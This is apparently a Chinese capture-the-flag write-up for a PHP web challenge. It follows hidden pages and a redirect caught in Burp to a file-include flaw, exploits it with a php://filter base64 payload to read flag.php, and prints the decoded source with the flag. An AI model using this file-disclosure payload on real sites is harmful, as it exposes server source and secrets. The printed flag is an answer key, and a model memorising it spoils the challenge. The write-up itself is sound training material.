一、题目打开,查看源码,发现有Archive_room.php,点击跳转。
二、点击secret,跳转到结束页面
三、结束页面提示回去再仔细看看,看大佬wp,怀疑是重定向,用burp抓包试试
四、发现有action.php,再试试
五、发现有secr3t.php ,访问
六、看见了源代码,看见flag.php,include,应该想到php伪协议,直接文件包含代码试试:
php://filter/read=convert.base64-encode/resource=flag.php。
playload:
网页?file=php://filter/read=convert.base64-encode/resource=flag.php
七、回显看起来是base64加密,解密一下
<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">啊哈ï¼ä½ 找到我了ï¼å¯æ˜¯ä½ 看ä¸åˆ°æˆ‘QAQ~~~</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "我就在这里";
$flag = 'flag{56e0e549-b5c0-464c-819e-e5291d577fdc}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>